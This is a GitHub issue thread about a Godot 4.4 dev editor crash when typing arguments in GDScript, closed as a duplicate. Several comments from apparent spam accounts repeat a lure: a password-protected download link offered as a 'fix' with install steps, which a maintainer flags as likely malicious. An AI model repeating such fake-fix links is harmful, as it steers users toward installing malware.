### ISSUE TITLE
Crash when writing some code

### ISSUE THREAD

**Issue by jinyangcruise** [godotengine/godot#96364] opened 2024-08-31 05:23 UTC
### Tested versions

- Reproducible in v4.4.dev1.official.28a72fa43
- Not Reproducible in v4.3.dev6.official.89850d553
- Not Reproducible in v4.3.stable.official

### System information

Windows 11, Vulkan API 1.3.205 - Forward+ - Using Vulkan Device #0: NVIDIA - NVIDIA GeForce RTX 3060 Ti

### Issue description

Any time when I write param into the brackets, the engine crash.
<img width="669" alt="crash" src="https://github.com/user-attachments/assets/1192600b-00a7-4865-8108-eb9b978a3568">

### Steps to reproduce

1. open MRP
2. open main.tscn
3. edit main.gd
4. write this code by your hand at line 6: `util.search()`
5. write anything in `()`, eg: `util.search(1)`, then crash happen.

It is worth mentioning that it won't crash if you don't write code by hand but by the way to paste a whole line of code `util.search(1)` at line 6 or close the comment at line 5

### Minimal reproduction project (MRP)

[test_crash.zip](https://github.com/user-attachments/files/16823536/test_crash.zip)

**Comment by rickdoq** [comment] 2024-08-31 05:28
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment] 2024-08-31 05:28
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment] 2024-08-31 05:29
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment] 2024-08-31 05:34
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by jinyangcruise** [comment] 2024-08-31 05:54
> hi bro, to fix your trouble try this fix, i see it in another issue, https://app.mediafire.com/dqajf1x14ccfd password: changeme when you installing it, you need to place a check in install to path and select usx

can you give more detailed explanation?

**Comment by dalexeev** [comment] 2024-08-31 06:23
> can you give more detailed explanation?

It's a spam. Please don't click on links from such comments, there may be malicious content.

**Comment by dalexeev** [comment] 2024-08-31 08:31
* A duplicate of #96239? CC @HolonProduction

**Comment by HolonProduction** [comment] 2024-08-31 10:34
Can't reproduce on master, so yeah

**Closed** 2024-08-31 10:37 UTC
Labels: bug, topic:gdscript, topic:editor, crash, regression
